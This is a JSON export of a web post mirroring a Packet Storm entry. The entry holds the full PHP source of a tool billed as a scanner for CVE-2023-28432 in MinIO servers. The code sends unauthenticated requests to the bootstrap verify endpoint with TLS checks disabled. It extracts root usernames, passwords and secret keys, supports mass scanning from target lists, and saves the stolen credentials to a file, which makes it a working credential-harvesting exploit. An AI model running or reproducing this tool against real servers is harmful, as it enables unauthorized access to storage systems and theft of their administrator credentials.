{"id":37630,"date":"2026-01-27T12:52:20","date_gmt":"2026-01-27T12:52:20","guid":{"rendered":"http:\/\/localhost\/?p=37630"},"modified":"2026-01-27T12:52:20","modified_gmt":"2026-01-27T12:52:20","slug":"minio-release2023-03-20t20-16-18z-vulnerability-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=37630","title":{"rendered":"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-27T18:01:46&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. The vulnerability allows unauthenticated access to sensitive environment variables through the \/minio\/bootstrap\/v1\/verify endpoint&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-27T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-01-27T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214442&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-28432&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner                                                                    |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.min.io\/                                                                                                         |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/213673\/ \\u0026 CVE-2023-28432\\n    \\n    [+] Summary    : This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. \\n                     The vulnerability allows unauthenticated access to sensitive environment variables through the \/minio\/bootstrap\/v1\/verify endpoint.\\n    \\n    [+] The tool supports:\\n    \\n    Scanning a single URL or multiple URLs from a file.\\n    \\n    Optional verbose mode with proof-of-concept style output.\\n    \\n    Detection and reporting of sensitive MinIO configuration keys (credentials, secrets, URLs).\\n    \\n    Result export to an output file.\\n    \\n    A placeholder for LeakIX integration to discover exposed MinIO instances.\\n    \\n    Colored CLI output and progress tracking for mass scans.\\n    \\n    It uses cURL for HTTP requests, validates JSON responses, checks for the presence of the MinioEnv object, and flags targets as vulnerable when sensitive environment data is exposed.\\n    An alternative lightweight standalone CLI implementation and a commented Composer-based advanced structure are also included.\\n    \\n    [+] PoC : php poc.php -u https:\/\/target:9000 -v\\n    \\n                          -f targets.txt -o result.txt\\n    \\n    \\u003c?php\\n    \\n    class MinioCVE202328432Scanner {\\n    \\n        private $leakixApiKey = \\&#8221;\\&#8221;;\\n        private $timeout = 5;\\n    \\n        private $fixedRelease = \\&#8221;RELEASE.2023-03-20T20-16-18Z\\&#8221;;\\n    \\n        private $sensitiveKeys = [\\n            \\&#8221;MINIO_ROOT_USER\\&#8221;,\\n            \\&#8221;MINIO_ROOT_PASSWORD\\&#8221;,\\n            \\&#8221;MINIO_SECRET_KEY_FILE\\&#8221;,\\n            \\&#8221;MINIO_ACCESS_KEY_FILE\\&#8221;,\\n            \\&#8221;MINIO_SERVER_URL\\&#8221;,\\n            \\&#8221;MINIO_IDENTITY_OPENID_CLIENT_SECRET\\&#8221;\\n        ];\\n    \\n        private $headers = [\\n            \\&#8221;User-Agent: Mozilla\/5.0\\&#8221;,\\n            \\&#8221;Accept: application\/json\\&#8221;\\n        ];\\n    \\n        public function __construct() {\\n            stream_context_set_default([\\n                &#8216;ssl&#8217; =\\u003e [\\n                    &#8216;verify_peer&#8217; =\\u003e false,\\n                    &#8216;verify_peer_name&#8217; =\\u003e false,\\n                ],\\n            ]);\\n        }\\n    \\n    \\n        private function detectVersionFromHeaders($headers) {\\n            foreach ($headers as $header) {\\n                if (stripos($header, &#8216;minio&#8217;) !== false) {\\n                    if (preg_match(&#8216;\/RELEASE\\\\.[0-9TZ\\\\-]+\/&#8217;, $header, $m)) {\\n                        return $m[0];\\n                    }\\n                }\\n            }\\n            return \\&#8221;Unknown\\&#8221;;\\n        }\\n    \\n        private function isVulnerableVersion($version) {\\n            if ($version === \\&#8221;Unknown\\&#8221;) return true;\\n            return strcmp($version, $this-\\u003efixedRelease) \\u003c 0;\\n        }\\n    \\n    \\n        public function fetchData($baseUrl, $verbose = true, $outputFile = null) {\\n    \\n            $endpoint = rtrim($baseUrl, &#8216;\/&#8217;) . &#8216;\/minio\/bootstrap\/v1\/verify&#8217;;\\n    \\n            if ($verbose) {\\n                $this-\\u003eprintMessage(\\&#8221;[*] Target: $endpoint\\&#8221;, \\&#8221;blue\\&#8221;);\\n            }\\n    \\n            $ch = curl_init($endpoint);\\n            curl_setopt_array($ch, [\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_POST =\\u003e true,\\n                CURLOPT_HTTPHEADER =\\u003e $this-\\u003eheaders,\\n                CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n                CURLOPT_HEADER =\\u003e true\\n            ]);\\n    \\n            $response = curl_exec($ch);\\n    \\n            if ($response === false) {\\n                $this-\\u003eprintMessage(\\&#8221;Connection error\\&#8221;, \\&#8221;red\\&#8221;);\\n                curl_close($ch);\\n                return;\\n            }\\n    \\n            $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n            $rawHeaders = substr($response, 0, $headerSize);\\n            $body = substr($response, $headerSize);\\n            curl_close($ch);\\n    \\n            $headers = explode(\\&#8221;\\\\r\\\\n\\&#8221;, $rawHeaders);\\n            $version = $this-\\u003edetectVersionFromHeaders($headers);\\n    \\n            $this-\\u003eprintMessage(\\&#8221;Detected Version: $version\\&#8221;, \\&#8221;yellow\\&#8221;);\\n    \\n            if (!$this-\\u003eisVulnerableVersion($version)) {\\n                $this-\\u003eprintMessage(\\&#8221;Target is NOT vulnerable (patched)\\&#8221;, \\&#8221;green\\&#8221;);\\n                return;\\n            }\\n    \\n            $data = json_decode($body, true);\\n    \\n            if (!is_array($data) || !isset($data[&#8216;MinioEnv&#8217;])) {\\n                $this-\\u003eprintMessage(\\&#8221;No MinioEnv found\\&#8221;, \\&#8221;green\\&#8221;);\\n                return;\\n            }\\n    \\n            $this-\\u003eprintMessage(\\&#8221;[VULNERABLE] $baseUrl\\&#8221;, \\&#8221;red\\&#8221;);\\n    \\n            $found = [];\\n    \\n            foreach ($this-\\u003esensitiveKeys as $key) {\\n                if (isset($data[&#8216;MinioEnv&#8217;][$key])) {\\n                    $val = $data[&#8216;MinioEnv&#8217;][$key];\\n                    $found[$key] = $val;\\n    \\n                    if ($verbose) {\\n                        $this-\\u003eprintMessage(\\&#8221;Key: $key\\&#8221;, \\&#8221;red\\&#8221;);\\n                        $this-\\u003eprintMessage(\\&#8221;Value: \\&#8221; . substr($val, 0, 5) . \\&#8221;*****\\&#8221;, \\&#8221;white\\&#8221;);\\n                    }\\n                }\\n            }\\n    \\n            if ($outputFile \\u0026\\u0026 !empty($found)) {\\n                $line = $baseUrl . \\&#8221; | Version=\\&#8221; . $version;\\n                foreach ($found as $k =\\u003e $v) {\\n                    $line .= \\&#8221; | $k=$v\\&#8221;;\\n                }\\n                file_put_contents($outputFile, $line . PHP_EOL, FILE_APPEND);\\n            }\\n        }\\n    \\n    \\n        public function massUrls($urls, $verbose = false, $outputFile = null) {\\n            $total = count($urls);\\n            $i = 0;\\n    \\n            foreach ($urls as $url) {\\n                $i++;\\n                $this-\\u003efetchData(trim($url), $verbose, $outputFile);\\n                $this-\\u003eprintProgress(\\&#8221;Scanning\\&#8221;, $i, $total);\\n            }\\n        }\\n    \\n    \\n        public function main() {\\n            global $argv;\\n    \\n            $opts = getopt(\\&#8221;u:f:o:v\\&#8221;);\\n    \\n            if (isset($opts[&#8216;u&#8217;])) {\\n                $this-\\u003efetchData($opts[&#8216;u&#8217;], isset($opts[&#8216;v&#8217;]), $opts[&#8216;o&#8217;] ?? null);\\n                return;\\n            }\\n    \\n            if (isset($opts[&#8216;f&#8217;]) \\u0026\\u0026 file_exists($opts[&#8216;f&#8217;])) {\\n                $urls = file($opts[&#8216;f&#8217;], FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n                $this-\\u003emassUrls($urls, isset($opts[&#8216;v&#8217;]), $opts[&#8216;o&#8217;] ?? null);\\n                return;\\n            }\\n    \\n            $this-\\u003eprintMessage(\\&#8221;Usage:\\&#8221;, \\&#8221;yellow\\&#8221;);\\n            echo \\&#8221;php minio_scanner.php -u \\u003curl\\u003e [-v]\\\\n\\&#8221;;\\n            echo \\&#8221;php minio_scanner.php -f \\u003cfile\\u003e [-o output.txt]\\\\n\\&#8221;;\\n        }\\n    \\n        private function printMessage($msg, $color = \\&#8221;white\\&#8221;) {\\n            $c = [\\n                &#8216;red&#8217; =\\u003e \\&#8221;\\\\033[31m\\&#8221;,\\n                &#8216;green&#8217; =\\u003e \\&#8221;\\\\033[32m\\&#8221;,\\n                &#8216;yellow&#8217; =\\u003e \\&#8221;\\\\033[33m\\&#8221;,\\n                &#8216;blue&#8217; =\\u003e \\&#8221;\\\\033[34m\\&#8221;,\\n                &#8216;white&#8217; =\\u003e \\&#8221;\\\\033[37m\\&#8221;,\\n                &#8216;reset&#8217; =\\u003e \\&#8221;\\\\033[0m\\&#8221;\\n            ];\\n            echo ($c[$color] ?? $c[&#8216;white&#8217;]) . $msg . $c[&#8216;reset&#8217;] . PHP_EOL;\\n        }\\n    \\n        private function printProgress($title, $current, $total) {\\n            $percent = round(($current \/ $total) * 100);\\n            echo \\&#8221;\\\\r$title: $percent% ($current\/$total)\\&#8221;;\\n            if ($current === $total) echo PHP_EOL;\\n        }\\n    }\\n    \\n    \\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        $scanner = new MinioCVE202328432Scanner();\\n        $scanner-\\u003emain();\\n    }\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214442&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.5,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214442\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-27T18:01:46&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. The vulnerability allows unauthenticated access to sensitive environment variables through&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-37630","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=37630\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-27T18:01:46&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. The vulnerability allows unauthenticated access to sensitive environment variables through...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=37630\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-27T12:52:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442\",\"datePublished\":\"2026-01-27T12:52:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630\"},\"wordCount\":1118,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.5\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37630#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630\",\"name\":\"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-27T12:52:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=37630\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=37630#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=37630","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-27T18:01:46&#8243;,&#8221;description&#8221;:&#8221;This PHP script is a command-line vulnerability scanner designed to detect CVE-2023-28432 in MinIO servers. The vulnerability allows unauthenticated access to sensitive environment variables through...","og_url":"https:\/\/zero.redgem.net\/?p=37630","og_site_name":"zero redgem","article_published_time":"2026-01-27T12:52:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=37630#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=37630"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442","datePublished":"2026-01-27T12:52:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=37630"},"wordCount":1118,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.5","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=37630#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=37630","url":"https:\/\/zero.redgem.net\/?p=37630","name":"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-27T12:52:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=37630#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=37630"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=37630#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 MinIO RELEASE.2023-03-20T20-16-18Z Vulnerability Scanner_PACKETSTORM:214442"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=37630"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/37630\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=37630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=37630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=37630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}